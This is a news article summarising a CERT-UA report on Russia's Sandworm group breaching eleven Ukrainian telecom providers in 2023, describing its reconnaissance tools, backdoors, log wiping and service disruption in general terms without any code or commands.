Sandworm Hackers from Russia Compromised 11 Ukrainian Telecoms Since May

    State-sponsored Russian hacking group ‘Sandworm’ has successfully compromised eleven telecommunication service providers in Ukraine between May and September 2023, according to a report by Ukraine’s Computer Emergency Response Team (CERT-UA). The report, which cites information from breached providers and ‘public resources,’ states that Sandworm interfered with the communication systems of these telcos, resulting in service disruptions and potential data breaches. Sandworm, a highly active espionage group affiliated with Russia’s GRU (armed forces), has focused its attacks on Ukraine this year using various tactics, including phishing lures, Android malware, and data-wipers.

    To initiate their attacks, Sandworm first conducts reconnaissance on the target telecommunication networks using the ‘masscan’ tool to scan for vulnerabilities. They search for open ports and unprotected RDP or SSH interfaces that can be exploited to breach the network. Furthermore, Sandworm employs tools like ‘ffuf,’ ‘dirbuster,’ ‘gowitness,’ and ‘nmap’ to identify potential weaknesses in web services that can be used to gain unauthorized access. The group has also leveraged compromised VPN accounts lacking multi-factor authentication to infiltrate networks. To avoid detection, Sandworm utilizes proxy servers such as ‘Dante’ and ‘socks5’ to route their malicious activities through previously compromised servers within the Ukrainian internet region, making their actions appear less suspicious.

    CERT-UA has identified two backdoors, ‘Poemgate’ and ‘Poseidon,’ in the breached ISP systems. Poemgate captures admin credentials, providing the hackers with additional accounts for lateral movement and deeper network infiltration. Poseidon, on the other hand, is a Linux backdoor that offers full remote computer control capabilities. To ensure persistence, Poseidon modifies Cron to add rogue jobs.

    Sandworm employs the ‘Whitecat’ tool to eliminate any traces of the attack and delete access logs. In the final stages of the attack, the hackers deploy scripts designed to disrupt services, with a particular focus on Mikrotik equipment, and wipe backups to make recovery more difficult.

    In response to these attacks, CERT-UA advises all service providers in Ukraine to follow their recommendations outlined in a cyber security guide in order to enhance the security of their systems and make it more challenging for cyber intruders to breach them.

    Latest articles

    Related articles